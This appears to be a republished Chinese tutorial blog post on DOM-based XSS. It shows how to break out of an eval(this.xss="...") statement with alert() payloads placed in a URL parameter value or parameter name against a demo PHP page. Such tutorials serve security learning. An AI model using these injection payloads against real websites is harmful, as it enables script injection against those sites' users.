大哥带的DOM-XSS进阶eval构造XSS

大哥带的DOM-XSS进阶eval构造XSS,第1张

概述0X01源码分析 那么我们可以如何来构造语法呐?? 已知eval函数可以执行js 最终的输出是eval(this.xss="你提交的参数";) 那我们是不是可以从参数这里构造一个js 比如 this.xss=1";alert(/zhong/);// 那么我们要这样构造 http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);// 当然这

0X01源码分析

那么我们可以如何来构造语法呐??
已知eval函数可以执行Js

最终的输出是eval(this.xss="你提交的参数";)

那我们是不是可以从参数这里构造一个Js

比如

this.xss=1";alert(/zhong/);//

那么我们要这样构造

http://www.xss_demo.com/DOM-xss5.PHP?xss=k";alert(/zhong/);//

当然这里未对参数名称做验证我们也可以直接在参数名称里面构造

xss

http://www.xss_demo.com/DOM-xss5.PHP?xss;alert(/zhong/);//=123456

 

 

切记 学习之路 少就是多 慢就是快

总结

以上是内存溢出为你收集整理的大哥带的DOM-XSS进阶eval构造XSS全部内容,希望文章能够帮你解决大哥带的DOM-XSS进阶eval构造XSS所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/1072721.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-26
下一篇 2022-05-26

发表评论

登录后才能评论

评论列表(0条)

保存